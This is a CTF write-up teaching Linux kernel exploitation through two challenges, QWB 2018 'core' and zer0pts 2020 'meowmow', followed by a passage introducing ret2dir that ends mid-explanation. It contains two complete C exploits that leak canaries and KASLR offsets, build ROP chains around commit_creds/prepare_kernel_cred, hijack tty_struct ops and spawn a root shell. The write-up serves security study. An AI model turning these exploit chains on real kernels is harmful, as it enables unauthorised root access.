Linux-Kernel-0x02-Practice

I. Kernel ROP

The idea is broadly the same as ROP in userland. The only difference is that we have to take care to save and restore the execution context :)

Example: 强网杯 (QWB) 2018 - core

0. Analyzing the decompiled code

The challenge archive contains the following files:
bzImage, core.cpio, start.sh, vmlinux
Let's look at start.sh first:

qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-s \
-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
-nographic \

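We can see that this challenge enables kaslr, so addresses are randomized and we need to leak them, just as in user mode. Also note that the version downloaded from ctf-wiki uses -m 64M, with which the VM may fail to boot. -m sets the guest memory size and 64M is too small, so just change it to 128M.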

Next, let's look at the init script we get after unpacking the file system:

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mv exp.c /
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2
insmod /core.ko
#setsid /bin/cttyhack setuidgid 0 /bin/sh

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0 -f

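From this we can see that the file system loads a module, core.ko, with insmod; this is usually where the vulnerability lives. We can also add the line setsid /bin/cttyhack setuidgid 0 /bin/sh so that we get a root shell as soon as we enter the VM. Don't panic: this is only because we are debugging locally, so we are free to modify the init script, and start.sh as well. We could even turn KASLR off. That doesn't mean we can ignore it; these changes are only there to make debugging easier. The remote target runs the challenge's own configuration, and all we get to submit is one exp.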
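Continuing with init, we also notice that at boot the kernel symbol table is copied to /tmp/kallsyms, which gives us the addresses of all kernel functions. One more annoyance is the automatic shutdown after 120 seconds, which we can comment out for now: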
poweroff -d 120 -f &

Analyzing the vulnerable module

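The module is built with a stack canary and NX, so a ROP attack first needs to leak the canary.
Next, let's analyze the relevant functions, starting with init_module.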

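When the module is loaded, it creates an entry named core under /proc (/proc/core in the VM), which is the interface we talk to.
Next, the more important function, ioctl: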

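It dispatches on three commands (0x6677889B: core_read, 0x6677889C: set off, 0x6677889A: core_copy_func, as used in the exp below). Let's open each of the called functions.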

core_read copies 64 bytes, starting at offset off into a local stack buffer, to the address supplied by the user.
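And the second ioctl case lets us set off ourselves, so by choosing the offset we can have the canary copied out to us. In IDA we can see where the canary is stored: it is 0x40 bytes past the local buffer v5, so we set off to 0x40.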

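We can also look at the module's file_operations (if you're not familiar with it, see my previous article on environment setup). It only implements the write, ioctl and release handlers: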

Now for the other functions, starting with core_write:


core_write copies up to 0x800 bytes from user space into name (a global in .bss). Tempting.
Next, core_copy_func, reached through the third ioctl command:


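It copies data from name onto the stack, and its length check has an integer overflow: the check treats the length as a signed 64-bit value, while the copy only uses its low 16 bits as an unsigned number. So if we pass a negative number, it passes the check and still copies a lot of data.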

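Since we can corrupt the stack, we can use ROP. First we need some gadgets, and they have to come from vmlinux. My recommendation is to dump them into a file and grep it, for example:

ROPgadget --binary ./vmlinux > ropgadget
grep "pop rdi ; ret" ropgadget

and search for the other gadgets the same way.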
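Under the hood, gadget search is just a byte-pattern search over the kernel's code. A minimal sketch, assuming the raw bytes of .text have been dumped to a file (e.g. with `objcopy -O binary --only-section=.text vmlinux text.bin`) and that .text starts at 0xffffffff81000000 in this vmlinux (an assumption; check with `readelf -S`). It looks for one exact encoding only, whereas real tools such as ROPgadget also enumerate longer sequences.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* x86-64 encodings: pop rdi = 0x5f, ret = 0xc3. */
static const uint8_t POP_RDI_RET_BYTES[] = { 0x5f, 0xc3 };

/* Offset of the first occurrence of pat in buf, or -1 if absent. */
static long find_bytes(const uint8_t *buf, size_t buf_len,
                       const uint8_t *pat, size_t pat_len)
{
    if (pat_len == 0 || pat_len > buf_len)
        return -1;
    for (size_t i = 0; i + pat_len <= buf_len; i++)
        if (memcmp(buf + i, pat, pat_len) == 0)
            return (long)i;
    return -1;
}

/* Gadget address = static address of .text + offset inside the dump. */
static uint64_t gadget_vaddr(uint64_t text_vaddr, long off)
{
    return text_vaddr + (uint64_t)off;
}
```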

1. Finding gadgets

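For the two key functions mentioned above, commit_creds and prepare_kernel_cred, we first look up their (static) addresses in vmlinux, for example with nm ./vmlinux | grep commit_creds.
Then we can look at the ropgadget file.

It contains the gadgets we need (they are simply instruction sequences taken from the kernel image itself). We then search it with grep, which I find quite handy; ROPgadget's or ropper's own search works too, depending on your preference.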

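Once we have the static addresses of the two functions, we read their actual addresses inside the exp; subtracting the static address from the actual one gives the KASLR offset.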
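The lookup and the subtraction can be sketched on an in-memory copy of the symbol file. This is a minimal sketch, assuming the usual /proc/kallsyms line format ("address type name", optionally followed by a [module] column); the function names, the sample dump and the static address 0xffffffff8109c8e0 for commit_creds are assumptions for illustration, so check the static address against your own vmlinux with nm.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Find `name` in text formatted like /proc/kallsyms
 * ("<hex addr> <type> <symbol>[\t[module]]" per line).
 * Returns 0 when the symbol is not present. */
static uint64_t kallsyms_lookup(const char *text, const char *name)
{
    for (const char *line = text; line != NULL && *line != '\0'; ) {
        unsigned long long addr;
        char type;
        char sym[128];
        if (sscanf(line, "%llx %c %127s", &addr, &type, sym) == 3 &&
            strcmp(sym, name) == 0)
            return (uint64_t)addr;
        line = strchr(line, '\n');      /* advance to the next line */
        if (line != NULL)
            line++;
    }
    return 0;
}

/* KASLR offset = runtime address - static address from vmlinux. */
static uint64_t kaslr_offset(uint64_t runtime_addr, uint64_t static_addr)
{
    return runtime_addr - static_addr;
}
```

Every static gadget address is then relocated by adding the same offset, e.g. `POP_RDI_RET + kaslr_offset(...)`.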
Next we search for the remaining gadgets. We need the following:

swapgs; popfq;  ret;
mov rdi, rax;  call rdx; 
pop rdx; ret;  
pop rdi; ret;   
pop rcx; ret; 
iretq

You can find them yourselves with the method above.

2. Saving the user-mode state ourselves

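Although the privilege escalation happens in kernel mode, we ultimately have to return to user mode to get a root shell. So after the stack-overflow ROP, the chain still has to execute swapgs and iretq, and iretq pops rip, cs, rflags, rsp and ss from the stack. How do we make sure this return doesn't crash? Before entering the kernel, we save the correct user-mode values of these registers into our own variables, so we can place them at the end of the ROP chain. Saving registers requires inline assembly; the code below can be treated as a general-purpose template: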

size_t user_cs, user_ss,user_rflags,user_sp;

//int fd = 0;        // file pointer of process 'core'

void saveStatus(){
  __asm__("mov user_cs, cs;"
          "mov user_ss, ss;"
          "mov user_sp, rsp;"
          "pushf;"
          "pop user_rflags;"
          );
  puts("\033[34m\033[1m Status has been saved . \033[0m");
}

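Since you're learning kernel pwn, your assembly is surely up to it, so I won't walk through this code: it simply copies cs, ss, rsp and rflags into the globals. Note that it is written in Intel syntax, so it must be compiled with -masm=intel.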
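If you'd rather not depend on -masm=intel, the same state can be captured with GCC's default AT&T syntax. A sketch, assuming an x86-64 target (on any other target the function does nothing); the name save_status_att is hypothetical. It moves rsp 128 bytes down before pushfq so the push cannot clobber the compiler's red zone.

```c
#include <stdint.h>

uint64_t user_cs, user_ss, user_rflags, user_sp;

/* AT&T-syntax variant of saveStatus: no -masm=intel needed. */
static void save_status_att(void)
{
#if defined(__x86_64__)
    uint64_t cs, ss, sp, rflags;
    __asm__ volatile(
        "mov %%cs, %0\n\t"       /* user code segment selector */
        "mov %%ss, %1\n\t"       /* user stack segment selector */
        "mov %%rsp, %2\n\t"      /* current user stack pointer */
        "sub $128, %%rsp\n\t"    /* step over the red zone */
        "pushfq\n\t"             /* rflags is only readable via the stack */
        "popq %3\n\t"
        "add $128, %%rsp\n\t"
        : "=r"(cs), "=r"(ss), "=r"(sp), "=r"(rflags)
        :
        : "memory");
    user_cs = cs;
    user_ss = ss;
    user_sp = sp;
    user_rflags = rflags;
#endif
}
```

Calling save_status_att() instead of saveStatus() would let you drop -masm=intel from the gcc command line.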

3. Attack plan

Now let's work out the attack. I already touched on it while introducing the functions above. The main steps are:

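  1. Use ioctl command 2 to set off to 0x40.

  2. Use core_read (ioctl command 1) to copy 64 bytes starting at v5 + off to user space; debugging shows the first qword is the canary.

  3. With the canary leaked, we can overflow the stack. But which stack? core_copy_func, called by the third ioctl command, copies name from .bss onto its stack, the number of bytes depends on the value we pass in, and its length check has an integer overflow. So it's our victim.

  4. The module's write handler copies our data into name in .bss. Perfect: we can build the ROP chain there and use it to overflow the stack.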

At this point you may be wondering: didn't we say we need to leak addresses? Did this guy forget? Don't worry, I'm getting to it. In the init script above there is this line:

cat /proc/kallsyms > /tmp/kallsyms

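/proc/kallsyms contains the kernel's symbol table, but once kptr_restrict is set to 1 (the next line of init), an unprivileged user only sees zeroed addresses in it. The challenge author kindly dumped it to /tmp/kallsyms before that, so we can still read the real addresses from user mode. Our exp therefore needs a function that walks this file, which is no problem for anyone who has studied systems programming (though I slacked off in that class....).
Here is the code: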

void get_function_address(){
        FILE* sym_table = fopen("/tmp/kallsyms", "r");        // dump of /proc/kallsyms made by init: addresses of all kernel functions
        if(sym_table == NULL){
                printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m");
                exit(1);
        }
        char line[0x100];
        // read line by line: fgets returns NULL at end of file, so the loop always terminates
        // (fscanf returns EOF, which is non-zero, so "while(fscanf(...))" would never stop)
        while(fgets(line, sizeof(line), sym_table)){
                size_t addr = 0;
                char type;
                char func_name[0x50];
                if(sscanf(line, "%zx %c %79s", &addr, &type, func_name) != 3)
                        continue;
                if(!strcmp(func_name, "commit_creds")){                // function "commit_creds" found
                        commit_creds = addr;
                        printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#zx\n", commit_creds);
                }else if(!strcmp(func_name, "prepare_kernel_cred")){
                        prepare_kernel_cred = addr;
                        printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#zx\n", prepare_kernel_cred);
                }
                if(commit_creds && prepare_kernel_cred)                // both addresses found, stop scanning
                        break;
        }
        fclose(sym_table);
}

Once the idea behind the exp is clear, everything else is straightforward: you just need to understand it and implement it.

4. Basic gdb debugging of the kernel in qemu

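As everyone knows, debugging, and dynamic debugging in particular, is crucial in pwn, so here is how to debug the kernel with gdb.
Because our kernel runs in qemu, gdb has to use remote debugging. If we just connect to the port, there are no symbols, which makes debugging painful, so we load the kernel symbols ourselves from the provided vmlinux. We also want the symbols of core.ko, which we load with add-symbol-file core.ko textaddr, where textaddr is the address of core.ko's .text section. Reading it requires root, so set the init script to give us a root shell.
The .text address can be read from /sys/module/core/sections/.text.
I strongly recommend turning KASLR off before debugging (in the start script, change kaslr to nokaslr).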


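We can open the debugging port with -gdb tcp::port or -s. start.sh already contains -s, so there is nothing more to set (-s is shorthand for -gdb tcp::1234).
Once we have the .text base address, use a script to start gdb; typing all of this every time is too tedious. The script is very simple: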

#!/bin/bash
gdb -q \
  -ex "file ./vmlinux" \
  -ex "add-symbol-file ./extract/core.ko 0xffffffffc0000000" \
  -ex "b core_copy_func" \
  -ex "target remote localhost:1234"

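You can start with a breakpoint on core_read; I only moved it to core_copy_func towards the end of debugging. Also note that with pwndbg I had to run gdb as root, otherwise it failed with a permission error.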


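That drove me mad at first, since peda doesn't need root. I didn't know why it failed and assumed it was a version issue, but this was a machine I had just set up, so that seemed unlikely. I should have realized it the moment I saw "permission", sigh.
Let's start debugging as root: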

As you can see, it works. Now I continue; remember the breakpoint we set? With b core_read, execution stops there as soon as the function is called. Let's run our program and try:


Now we can happily debug. That wraps up basic kernel debugging with gdb~~~

5. ROP chain walkthrough

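Briefly, the chain works as follows. The first 10 qwords are all the canary: they fill the 0x40-byte buffer, the canary slot and the slot just before the return address. From the return address on, pop rdi; ret sets rdi = 0 and returns into prepare_kernel_cred(0), which leaves the new cred pointer in rax. pop rdx; ret loads the address of the pop rcx; ret gadget into rdx. mov rdi, rax; call rdx then moves the cred into rdi, and the return address pushed by call is discarded by pop rcx, so its ret goes into commit_creds(cred). Finally swapgs; popfq; ret (followed by a dummy 0 for popfq) restores the user GS base, and iretq pops rip (shell), cs, rflags, rsp and ss to land back in user mode.

It should be easy to follow.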
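The chain can also be written as a standalone builder, which makes the slot layout explicit. A sketch assuming the layout the exp relies on (slots 0-7: the 0x40-byte buffer, slot 8: canary, slot 9: a saved register, slot 10: return address); the gadget addresses are the exp's unrelocated ones, while build_core_chain and struct user_state are hypothetical names.

```c
#include <stddef.h>
#include <stdint.h>

/* Unrelocated gadget addresses, copied from the exp. */
#define POP_RDI_RET          0xffffffff81000b2fULL
#define POP_RDX_RET          0xffffffff810a0f49ULL
#define POP_RCX_RET          0xffffffff81021e53ULL
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6aULL
#define SWAPGS_POPFQ_RET     0xffffffff81a012daULL
#define IRETQ                0xffffffff81050ac2ULL

struct user_state { uint64_t cs, ss, rflags, sp; };

/* Writes the payload for core_copy_func into chain; returns its length in qwords. */
static size_t build_core_chain(uint64_t *chain, uint64_t canary, uint64_t kaslr_off,
                               uint64_t prepare_kernel_cred, uint64_t commit_creds,
                               uint64_t user_rip, const struct user_state *st)
{
    size_t i = 0;
    while (i < 10)
        chain[i++] = canary;                       /* buffer, canary slot, slot 9 */
    chain[i++] = POP_RDI_RET + kaslr_off;          /* rdi = 0 */
    chain[i++] = 0;
    chain[i++] = prepare_kernel_cred;              /* rax = prepare_kernel_cred(0) */
    chain[i++] = POP_RDX_RET + kaslr_off;          /* rdx = &(pop rcx; ret) */
    chain[i++] = POP_RCX_RET + kaslr_off;
    chain[i++] = MOV_RDI_RAX_CALL_RDX + kaslr_off; /* rdi = cred; pop rcx eats call's push */
    chain[i++] = commit_creds;                     /* commit_creds(cred) */
    chain[i++] = SWAPGS_POPFQ_RET + kaslr_off;     /* back to the user GS base */
    chain[i++] = 0;                                /* value for popfq */
    chain[i++] = IRETQ + kaslr_off;                /* iretq frame follows */
    chain[i++] = user_rip;
    chain[i++] = st->cs;
    chain[i++] = st->rflags;
    chain[i++] = st->sp;
    chain[i++] = st->ss;
    return i;
}
```

The result is 25 qwords (0xC8 bytes), which fits in the 0x100 bytes that core_copy_func copies with the 0xffffffffffff0100 length.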

6. exp

Here is the full exp:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/ioctl.h>

size_t commit_creds = 0, prepare_kernel_cred = 0; // runtime addresses of the two key functions
// static (unrelocated) address of commit_creds in the challenge's vmlinux
// (0xffffffff81000000 + 0x9c8e0); verify with: nm ./vmlinux | grep commit_creds
#define RAW_COMMIT_CREDS 0xffffffff8109c8e0
#define SWAPGS_POPFQ_RET 0xffffffff81a012da
#define MOV_RDI_RAX_CALL_RDX 0xffffffff8101aa6a
#define POP_RDX_RET 0xffffffff810a0f49
#define POP_RDI_RET 0xffffffff81000b2f
#define POP_RCX_RET 0xffffffff81021e53
#define IRETQ 0xffffffff81050ac2
size_t user_cs, user_ss,user_rflags,user_sp;

void saveStatus(){
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("\033[34m\033[1m Status has been saved . \033[0m");
}

void core_read(int fd, char *addr){      // ioctl 0x6677889B: copy 64 bytes from stack buffer + off to addr
    printf("try read\n");
    ioctl(fd,0x6677889B,addr);
    printf("read done!\n");
}

void change_off(int fd, long long off){  // ioctl 0x6677889C: set off
    printf("try set off \n");
    ioctl(fd,0x6677889C,off);
}

void core_copy_func(int fd, long long nbytes){  // ioctl 0x6677889A: copy name onto the stack
    puts("try cp");
    ioctl(fd,0x6677889A,nbytes);
}

void get_function_address(){
    FILE* sym_table = fopen("/tmp/kallsyms", "r"); // dump of /proc/kallsyms made by init
    if(sym_table == NULL){
        printf("\033[31m\033[1m[x] Error: Cannot open file \"/tmp/kallsyms\"\n\033[0m");
        exit(1);
    }
    char line[0x100];
    // fgets returns NULL at end of file, so the loop always terminates
    while(fgets(line, sizeof(line), sym_table)){
        size_t addr = 0;
        char type;
        char func_name[0x50];
        if(sscanf(line, "%zx %c %79s", &addr, &type, func_name) != 3)
            continue;
        if(!strcmp(func_name, "commit_creds")){ // function "commit_creds" found
            commit_creds = addr;
            printf("\033[32m\033[1m[+] Note: Address of function \"commit_creds\" found: \033[0m%#zx\n", commit_creds);
        }else if(!strcmp(func_name, "prepare_kernel_cred")){
            prepare_kernel_cred = addr;
            printf("\033[32m\033[1m[+] Note: Address of function \"prepare_kernel_cred\" found: \033[0m%#zx\n", prepare_kernel_cred);
        }
        if(commit_creds && prepare_kernel_cred) // both found, stop scanning
            break;
    }
    fclose(sym_table);
}

void shell(){
    if(getuid()){
        printf("\033[31m\033[1m[x] Error: Failed to get root, exiting......\n\033[0m");
        exit(1);
    }
    printf("\033[32m\033[1m[+] Getting the root......\033[0m\n");
    system("/bin/sh");
    exit(0);
}

int main(){
    saveStatus();
    int fd = open("/proc/core", O_RDWR); // fd of the module's /proc entry
    if(fd < 0){
        printf("\033[31m\033[1m[x] Error: Cannot open \"/proc/core\"\n\033[0m");
        exit(1);
    }
    char buffer[0x100] = {0};
    get_function_address(); // get addresses of the two key functions
    if(!commit_creds || !prepare_kernel_cred){
        puts("[x] Error: symbols not found in /tmp/kallsyms");
        exit(1);
    }
    size_t offset = commit_creds - RAW_COMMIT_CREDS; // KASLR offset
    printf("kaslr offset = %#zx\n", offset);
    //get canary
    size_t canary;
    change_off(fd,0x40);
    //getchar();

    core_read(fd,buffer);
    canary = ((size_t *)buffer)[0];
    printf("canary ==> %#zx\n",canary);
    //build the ROP chain (0x100 qwords = the 0x800 bytes written below)
    size_t rop_chain[0x100] = {0}, i = 0;
    printf("construct the chain\n");
    for(i=0; i< 10 ;i++){
        rop_chain[i] = canary;
    }
    rop_chain[i++] = POP_RDI_RET + offset;
    rop_chain[i++] = 0;
    rop_chain[i++] = prepare_kernel_cred; //prepare_kernel_cred(0)
    rop_chain[i++] = POP_RDX_RET + offset;
    rop_chain[i++] = POP_RCX_RET + offset; // discards the return address pushed by call rdx
    rop_chain[i++] = MOV_RDI_RAX_CALL_RDX + offset;
    rop_chain[i++] = commit_creds; //commit_creds(cred)
    rop_chain[i++] = SWAPGS_POPFQ_RET + offset;
    rop_chain[i++] = 0; // popped into rflags by popfq
    rop_chain[i++] = IRETQ + offset;
    rop_chain[i++] = (size_t)shell; // user rip
    rop_chain[i++] = user_cs;
    rop_chain[i++] = user_rflags;
    rop_chain[i++] = user_sp;
    rop_chain[i++] = user_ss;
    write(fd,rop_chain,0x800); // copied into name in .bss
    core_copy_func(fd,0xffffffffffff0100); // negative: passes the check, copies 0x100 bytes
    return 0;
}



7. Compile and run

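A small tip: the attacked kernel's environment usually doesn't provide the libraries we need, so we link statically with gcc's -static option. To support the inline assembly we also pass -masm=intel, because the state-saving code above is written in Intel syntax. If your inline assembly uses AT&T syntax instead, use -masm=att (GCC's default) or simply drop the option.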

gcc test.c -o test -static -masm=intel -g

Pack the resulting binary into the file system and reboot the VM:

Root obtained!!!!!

Example: zer0pts CTF 2020 - meowmow

The usual protections are enabled, but debugging shows that the kernel was built without the following options:

CONFIG_SLAB_FREELIST_RANDOM=n
CONFIG_SLAB_FREELIST_HARDENED=n

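And the module has an obvious out-of-bounds read/write: count is only clamped when it is larger than MAX_SIZE, so f_pos + count can run well past the end of memo.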

static ssize_t mod_read(struct file *filp, char __user *buf, size_t count, loff_t *f_pos)
{
if (filp->f_pos < 0 || filp->f_pos >= MAX_SIZE) return 0;
if (count < 0) return 0;
if (count > MAX_SIZE) count = MAX_SIZE - *f_pos;
if (copy_to_user(buf, &memo[filp->f_pos], count)) return -EFAULT;
*f_pos += count;
return count;
}

static ssize_t mod_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos)
{
if (filp->f_pos < 0 || filp->f_pos >= MAX_SIZE) return 0;
if (count < 0) return 0;
if (count > MAX_SIZE) count = MAX_SIZE - *f_pos;
if (copy_from_user(&memo[filp->f_pos], buf, count)) return -EFAULT;
*f_pos += count;
return count;
}

static loff_t mod_llseek(struct file *filp, loff_t offset, int whence)
{
loff_t newpos;
switch(whence) {
case SEEK_SET:
newpos = offset;
break;
case SEEK_CUR:
newpos = filp->f_pos + offset;
break;
case SEEK_END:
newpos = strlen(memo) + offset;
break;
default:
return -EINVAL;
}
if (newpos < 0) return -EINVAL;
filp->f_pos = newpos;
return newpos;
}

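So we can easily leak a heap address, and from it we also know the address of our own chunk, because the freelist (not randomized here) hands out chunks in order.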
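Both steps can be checked with a user-space model. A sketch that mirrors the checks in mod_read above and assumes, as the exp does, that the free pointer sits at offset 0 of a free object and that the free chunks after memo are handed out in ascending order; the helper names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_SIZE 0x400   /* size of memo, as in the exp */

/* Bytes mod_read would copy for a given position and count: count is only
 * clamped when it is larger than MAX_SIZE, so pos + count may pass the end. */
static size_t mod_read_len(int64_t pos, size_t count)
{
    if (pos < 0 || pos >= MAX_SIZE)
        return 0;
    if (count > MAX_SIZE)
        count = MAX_SIZE - (size_t)pos;
    return count;
}

/* The first qword of the free object right after memo points to the next
 * free object, memo + 2 * MAX_SIZE, so memo = leak - 0x800. */
static uint64_t memo_addr_from_leak(uint64_t next_free_ptr)
{
    return next_free_ptr - 2 * MAX_SIZE;
}
```

Reading 0x400 bytes from position 0x300 copies memo[0x300..0x700), so buf[0x100] in the exp is the first qword of the neighbouring object.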

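Since the module's buffer comes from kmalloc-1k, we use tty_struct, which is allocated from the same cache: we leak a kernel address from its ops pointer (ptm_unix98_ops) to get the kernel base, then hijack that ops field with a fake table to escalate privileges reliably.

Finding mov rdi, rax was genuinely hard; in the end I found a suitable gadget inside the function convert_to_art_dsc :^)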

Here is the exp for this challenge:

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/fs.h>


#define MAX_SIZE 0x400 //1k,nice
#define TTY_SPRAY_NR 16
#define PTM_UNIX98_OPS 0xffffffff81e65900
#define POP_RDI_RET 0xffffffff81001268
#define LEAVE_RET 0xffffffff81008ae7
#define ADD_RSP_0X28_RET 0xffffffff810db617
#define PREPARE_KERNEL_CRED 0xffffffff8107bb50
#define COMMIT_CREDS 0xffffffff8107b8b0
#define PUSH_RAX_RET 0xffffffff81022353
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE 0xFFFFFFFF81A00A45
#define POP_RDX_RET 0xffffffff81043137
#define MOV_RDI_RAX_RET 0xffffffff81021f38
/* to run the exp on the specific core only */
void bind_cpu(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

void debug(){
puts("[!]Debug here!");
getchar();
}
/*
* save the process current context
* */
size_t user_cs, user_ss,user_rflags,user_sp;

void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m Status has been saved . \033[0m");
}



#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)

void info_log(char* str){
printf("\033[0m\033[32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
exit(1);
}

void get_rootshell(){
if(getuid()){
error_log("Priviledge elevation failed!");
}
system("/bin/sh");
exit(0);
}
int dev_fd;
int tty_fd;
size_t memo_chunk_addr;
size_t kernel_offset;
size_t fake_tty_ops;
size_t *rop;

int main(void){
int index = 0;
char buf[0x400];
saveStatus();
puts("[*]Leaking the kernel heap addr...");
dev_fd = open("/dev/memo", O_RDWR);
if(dev_fd < 0){
error_log("Allocate memo failed...");
}
if(lseek(dev_fd, 0x300, SEEK_CUR) < 0){
error_log("lseek failed!");
}
if(read(dev_fd, buf, 0x400) < 0){
error_log("read failed!");
}

memo_chunk_addr =*(size_t *)&buf[0x100] - 0x800;
PRINT_ADDR("memo_chunk_addr", memo_chunk_addr);

info_log("Leaking the kernel base...");
tty_fd = open("/dev/ptmx", O_RDWR);

memset(buf, 'A', 0x400);
if(lseek(dev_fd, 0x300, SEEK_SET) < 0){
error_log("lseek failed!");
}
if(read(dev_fd, buf, 0x400) < 0){
error_log("read failed!");
}

kernel_offset = *(size_t *)&buf[0x118] - PTM_UNIX98_OPS;
PRINT_ADDR("kernel_offset", kernel_offset);

if(lseek(dev_fd, 0, SEEK_SET) < 0){
error_log("lseek failed");
}

if(lseek(dev_fd, 0x300, SEEK_SET) < 0){
error_log("lseek failed!");
}

fake_tty_ops = memo_chunk_addr + 0x300;
*(size_t *)&(buf[0x118]) = fake_tty_ops;
*(size_t *)&(buf[0x60]) = LEAVE_RET + kernel_offset;
*(size_t *)&(buf[0x108]) = ADD_RSP_0X28_RET + kernel_offset;

rop = (size_t *)&(buf[0x138]);
rop[index++] = POP_RDI_RET + kernel_offset;
rop[index++] = 0;
rop[index++] = PREPARE_KERNEL_CRED + kernel_offset;
rop[index++] = MOV_RDI_RAX_RET + kernel_offset;
rop[index++] = COMMIT_CREDS + kernel_offset;
rop[index++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE + kernel_offset;
rop[index++] = 0xdeadbeef;
rop[index++] = 0xdeadbeef;
rop[index++] = (size_t)get_rootshell;
rop[index++] = user_cs;
rop[index++] = user_rflags;
rop[index++] = user_sp+8;
rop[index++] = user_ss;



write(dev_fd, buf, sizeof(buf));
ioctl(tty_fd, 0, 0);
}

II. Kernel ret2dir

0. How ret2dir works

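ret2dir is a technique for getting around SMEP/SMAP: SMEP prevents the kernel from executing user-space code, and SMAP prevents it from accessing user-space data. It was first proposed in a 2014 paper, linked here: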

ret2dir original paper
First we need to know the basic virtual memory layout of Linux; interested readers can follow the link below:

Linux memory layout

It contains the following regions (x86-64, 4-level page tables):

========================================================================================================================
    Start addr    |   Offset   |     End addr     |  Size   | VM area description
========================================================================================================================
                  |            |                  |         |
 0000000000000000 |    0       | 00007fffffffffff |  128 TB | user-space virtual memory, different per mm
__________________|____________|__________________|_________|___________________________________________________________
                  |            |                  |         |
 0000800000000000 | +128    TB | ffff7fffffffffff | ~16M TB | ... huge, almost 64 bits wide hole of non-canonical
                  |            |                  |         |     virtual memory addresses up to the -128 TB
                  |            |                  |         |     starting offset of kernel mappings.
__________________|____________|__________________|_________|___________________________________________________________
                                                            |
                                                            | Kernel-space virtual memory, shared between all processes:
____________________________________________________________|___________________________________________________________
                  |            |                  |         |
 ffff800000000000 | -128    TB | ffff87ffffffffff |    8 TB | ... guard hole, also reserved for hypervisor
 ffff880000000000 | -120    TB | ffff887fffffffff |  0.5 TB | LDT remap for PTI
 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)
 ffffc88000000000 |  -55.5  TB | ffffc8ffffffffff |  0.5 TB | ... unused hole
 ffffc90000000000 |  -55    TB | ffffe8ffffffffff |   32 TB | vmalloc/ioremap space (vmalloc_base)
 ffffe90000000000 |  -23    TB | ffffe9ffffffffff |    1 TB | ... unused hole
 ffffea0000000000 |  -22    TB | ffffeaffffffffff |    1 TB | virtual memory map (vmemmap_base)
 ffffeb0000000000 |  -21    TB | ffffebffffffffff |    1 TB | ... unused hole
 ffffec0000000000 |  -20    TB | fffffbffffffffff |   16 TB | KASAN shadow memory
__________________|____________|__________________|_________|____________________________________________________________
                                                            |
                                                            | Identical layout to the 56-bit one from here on:
____________________________________________________________|____________________________________________________________
                  |            |                  |         |
 fffffc0000000000 |   -4    TB | fffffdffffffffff |    2 TB | ... unused hole
                  |            |                  |         | vaddr_end for KASLR
 fffffe0000000000 |   -2    TB | fffffe7fffffffff |  0.5 TB | cpu_entry_area mapping
 fffffe8000000000 |   -1.5  TB | fffffeffffffffff |  0.5 TB | ... unused hole
 ffffff0000000000 |   -1    TB | ffffff7fffffffff |  0.5 TB | %esp fixup stacks
 ffffff8000000000 | -512    GB | ffffffeeffffffff |  444 GB | ... unused hole
 ffffffef00000000 |  -68    GB | fffffffeffffffff |   64 GB | EFI region mapping space
 ffffffff00000000 |   -4    GB | ffffffff7fffffff |    2 GB | ... unused hole
 ffffffff80000000 |   -2    GB | ffffffff9fffffff |  512 MB | kernel text mapping, mapped to physical address 0
 ffffffff80000000 |-2048    MB |                  |         |
 ffffffffa0000000 |-1536    MB | fffffffffeffffff | 1520 MB | module mapping space
 ffffffffff000000 |  -16    MB |                  |         |
    FIXADDR_START | ~-11    MB | ffffffffff5fffff | ~0.5 MB | kernel-internal fixmap range, variable size and offset
 ffffffffff600000 |  -10    MB | ffffffffff600fff |    4 kB | legacy vsyscall ABI
 ffffffffffe00000 |   -2    MB | ffffffffffffffff |    2 MB | ... unused hole
__________________|____________|__________________|_________|___________________________________________________________



Note this line:

 ffff888000000000 | -119.5  TB | ffffc87fffffffff |   64 TB | direct mapping of all physical memory (page_offset_base)

From its description we can see that it maps all of physical memory.
Another point: in the Linux kernel, memory is usually allocated in one of two ways:

